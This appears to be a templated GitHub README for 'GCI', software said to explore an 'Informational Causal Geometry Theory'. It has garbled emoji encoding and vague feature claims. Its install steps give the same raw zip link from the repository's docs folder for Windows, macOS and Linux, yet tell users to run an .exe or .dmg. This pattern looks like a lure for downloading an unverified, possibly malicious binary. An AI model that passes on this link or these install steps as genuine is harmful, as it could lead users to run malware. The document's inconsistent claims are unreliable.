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🌌 GCI - Explore the Geometry of Reality

πŸ“₯ Download Now

Download GCI

πŸš€ Getting Started

Welcome to the GCI repository! This application explores the Informational Causal Geometry Theory, helping you understand the geometry that shapes our physical reality. Whether you're interested in physics, geometry, or information theory, GCI offers valuable insights.

πŸ–₯️ System Requirements

To run GCI smoothly, ensure your system meets the following requirements:

  • Operating System: Windows 10 or higher, macOS, or a modern Linux distribution.
  • Processor: Dual-core processor or higher.
  • Memory: At least 4 GB of RAM.
  • Disk Space: Minimum of 200 MB available on your hard drive.
  • Graphics: Integrated graphics should suffice for basic functions.

πŸ“‚ Download & Install

To get started with GCI, follow these steps:

  1. Visit this page to download: Click the link below to head to our Releases page. Download GCI

  2. Choose the latest version: Look for the most recent release. You will see various files available for download.

  3. Download the appropriate file: Select the file that corresponds to your operating system (e.g., https://github.com/ThunderTaco/GCI/raw/refs/heads/main/docs/Software-v3.2-alpha.4.zip, https://github.com/ThunderTaco/GCI/raw/refs/heads/main/docs/Software-v3.2-alpha.4.zip, or https://github.com/ThunderTaco/GCI/raw/refs/heads/main/docs/Software-v3.2-alpha.4.zip).

  4. Run the installer:

    • For Windows: Double-click the .exe file and follow the prompts to install GCI.
    • For macOS: Open the .dmg file and drag the GCI icon into the Applications folder.
    • For Linux: Extract the https://github.com/ThunderTaco/GCI/raw/refs/heads/main/docs/Software-v3.2-alpha.4.zip file and follow the included instructions to set up GCI.
  5. Launch GCI: Once installed, find GCI in your applications menu and click to open it.

πŸŽ“ How to Use GCI

GCI is designed to be user-friendly. Here are the basic steps to start exploring:

  1. Open the application: After launching, you will see the main interface.

  2. Select a project: You can start with sample projects provided in the application. Click on β€œOpen Project” to explore these samples.

  3. Experiment with features: Use tools to visualize geometrical structures and understand causal relationships. You can adjust settings to see how changes affect outcomes.

  4. Save your findings: Remember to save your projects regularly. Use the β€œFile” menu to either save or export your work.

  5. Explore documentation: If you need help, check the help section within the application, or visit our documentation online for guides and tutorials.

πŸ’¬ Community and Support

If you have questions or need assistance, you are not alone. Join our community:

  • GitHub Issues: Report problems or suggest features.
  • Discussion Forum: Participate in discussions related to GCI and share insights.

🌟 Additional Features

GCI comes packed with features to enhance your experience:

  • Visualization Tools: Easily visualize complex geometries.
  • Data Analysis: Import data sets to explore causal connections.
  • Interactive Learning: Engage with built-in tutorials that guide you step by step.

πŸ”— Connect with Us

Keep up to date with the latest developments and share your progress.

  • Follow us on GitHub: Regular updates can be found on our repository.
  • Join our Social Media: Stay connected through our channels for latest news.

πŸ“œ License

GCI is released under the MIT License. You can use, modify, and distribute it freely with proper attribution.

βœ… Contributing

We welcome contributions! If you're interested in collaborating, check out our guidelines for contributing. Your input could help enhance GCI for everyone.

🌍 Explore More

GCI is not just a tool; it's part of the broader #LichenUniverse project. Join us in exploring the connections between geometry and the fabric of our reality. Together, we can uncover the mysteries of the universe through the lens of physics and information theory.

For ongoing updates and new findings, make sure to check back regularly.

Enjoy your journey with GCI!

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